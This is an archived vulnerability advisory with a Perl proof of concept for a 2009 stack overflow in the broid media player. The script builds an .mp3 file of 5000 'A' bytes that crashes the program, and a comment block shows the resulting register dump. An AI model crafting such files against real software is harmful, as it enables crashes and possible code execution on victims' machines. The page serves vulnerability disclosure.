broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC

vendor:

broid

by:

HACK4LOVE

9,3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: broid

Affected Version From: 1.0 Beta 3a

Affected Version To: 1.0 Beta 3a

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC

A stack-based buffer overflow vulnerability exists in broid 1.0 Beta 3a when handling .mp3 files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a lack of proper bounds checking when handling .mp3 files. An attacker can exploit this vulnerability by enticing a victim to open a specially crafted .mp3 file.

Mitigation:

Upgrade to the latest version of broid 1.0 Beta 3a or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC
# http://s1.freedownloadsplace.com/download-soft1/broid-1.0-Beta-3a.zip
########################################################################################
##EAX 8C8C8C7D
##ECX 41414141
##EDX C3C3C3C3
##EBX 00FE28B8 ASCII "C:\Documents and Settings\ahmed\Desktop\hack4love.mp3"
##ESP 0012EF74
##EBP 00FFE128
##ESI 00001388
##EDI 41414141
##EIP 004784FF broidegn.004784FF
#######################################################################################
#Thanks*SimO-s0fT /\RAYO/\deco017/\mo7areb/\ELNAMER ELMASRY/\EL7ADRANY/\SKULL-HACKER
# Stack/\His0k4/\ThE g0bL!N/\ZAX/\ASER ELRO7/\SAR7ABEL ELSAFA7
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.mp3');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-08-18]